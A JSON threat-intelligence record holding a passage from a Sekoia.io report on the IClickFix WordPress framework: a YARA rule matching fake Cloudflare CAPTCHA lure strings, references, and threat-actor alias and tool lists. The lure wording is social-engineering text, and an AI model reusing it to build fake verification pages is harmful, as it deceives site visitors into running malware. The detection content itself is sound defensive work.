cluster, impersonating Cloudflare Turnstile CAPTCHA\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-12-04\"\r\n modification_date = \"2025-12-04\"\r\n classification = \"TLP:CLEAR\"\r\n strings:\r\n //HTML page containing JavaScript and a second HTML corresponding to the ClickFix lure\r\n $lure01 = \"let clickCopy\" ascii\r\n $lure02 = \"let clickCounts\" ascii\r\n $lure03 = \"let delay\" ascii\r\n $lure04 = \"let COPYbase64Text\" ascii\r\n $lure05 = \"let rayID\" ascii\r\n $lure06 = \"'Cloudflare protection – verify with code:\" ascii\r\n $lure07 = \"center.innerHTML\" ascii\r\n $lure08 = \"Verify you are human\" ascii\r\n $lure09 = \"location.host + \" ascii\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 18 of 19\n\n$lure10 = \"needs to review the security of your connection before proceeding.\" ascii\r\n $lure11 = \"Unusual Web Traffic Detected\" ascii\r\n $lure12 = \"Our security system has identified irregular web activity\" ascii\r\n $lure13 = \"originating from your IP address. Automated verification\" ascii\r\n $lure14 = \"unable to confirm that you are a legitimate user.\" ascii\r\n $lure15 = \"This manual verification step helps us ensure that your connection\" ascii\r\n condition:\r\n 9 of ($lure*)\r\n}\r\nExternal references\r\n1. [Medium] Bypassing Malicious TDS in ClickFix Campaigns, by Walmart Global Tech Blog ↩︎\r\n2. [Sekoia.io] ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery ↩︎\r\n3. [urlquery] About urlquery.net ↩︎\r\n4. [Share Sekoia.io] Video example of a website compromised by IClickFix framework (A video example of a website\r\ncompromised by this infection chain is available at this link) ↩︎\r\n5. [GitHub] YOURLS ↩︎\r\n6. [urlscan.io] Scan results for hxxps://ksfldfklskdmbxcvb[.]com/admin/ ↩︎\r\n7. [GitHub] YOURLS/includes/functions.php ↩︎\r\n8. [eSentire] EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT ↩︎\r\n9. [WordPress] Elementor Website Builder – WordPress plugin ↩︎\r\n10. [WordPress] WooCommerce – WordPress plugin ↩︎\r\n11. [WordPress] Gravity Forms Plugin ↩︎\r\nFeel free to read other Sekoia.io TDR (Threat Detection \u0026 Research) analysis here:\r\nPhishing Campaigns “I Paid Twice” Targeting Booking.com Hotels and Customers\r\nLeveraging Landlock telemetry for Linux detection engineering\r\nAdvent of Configuration Extraction – Part 1: Pipeline Overview – First Steps with Kaiji Configuration Unboxing\r\nFrench NGO Reporters Without Borders targeted by Calisto in recent campaign\r\nTransparentTribe targets Indian military organisations with DeskRAT\r\nClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery\r\nCTI Cybercrime\r\nShare this post:\r\nSource: https://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 19 of 19\n\nthe ClickFix cluster. From compromised WordPress to infected system \nAs of 9 December 2025, here is an overview of the infection chains’ stages observed4 :\n Page 4 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/" ], "report_names": [ "meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic" ], "threat_actors": [ { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "2d06d270-acfd-4db8-83a8-4ff68b9b1ada", "created_at": "2022-10-25T16:07:23.477794Z", "updated_at": "2026-04-10T02:00:04.625004Z", "deleted_at": null, "main_name": "Cold River", "aliases": [ "Blue Callisto", "BlueCharlie", "Calisto", "Cobalt Edgewater", "Gossamer Bear", "Grey Pro", "IRON FRONTIER", "Mythic Ursa", "Nahr Elbard", "Nahr el bared", "Seaborgium", "Star Blizzard", "TA446", "TAG-53", "UNC4057" ], "source_name": "ETDA:Cold River", "tools": [ "Agent Drable", "AgentDrable", "DNSpionage", "LOSTKEYS", "SPICA" ], "source_id": "ETDA", "reports": null }, { "id": "3a057a97-db21-4261-804b-4b071a03c124", "created_at": "2024-06-04T02:03:07.953282Z", "updated_at": "2026-04-10T02:00:03.813595Z", "deleted_at": null, "main_name": "IRON FRONTIER", "aliases": [ "Blue Callisto ", "BlueCharlie ", "CALISTO ", "COLDRIVER ", "Callisto Group ", "GOSSAMER BEAR ", "SEABORGIUM ", "Star Blizzard ", "TA446 " ], "source_name": "Secureworks:IRON FRONTIER", "tools": [ "Evilginx2", "Galileo RCS", "SPICA" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434428, "ts_updated_at": 1775826786, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/29e31357ae811beabbe597ff82092503a5a73c3e.pdf", "text": "https://archive.orkl.eu/29e31357ae811beabbe597ff82092503a5a73c3e.txt", "img": "https://archive.orkl.eu/29e31357ae811beabbe597ff82092503a5a73c3e.jpg" } }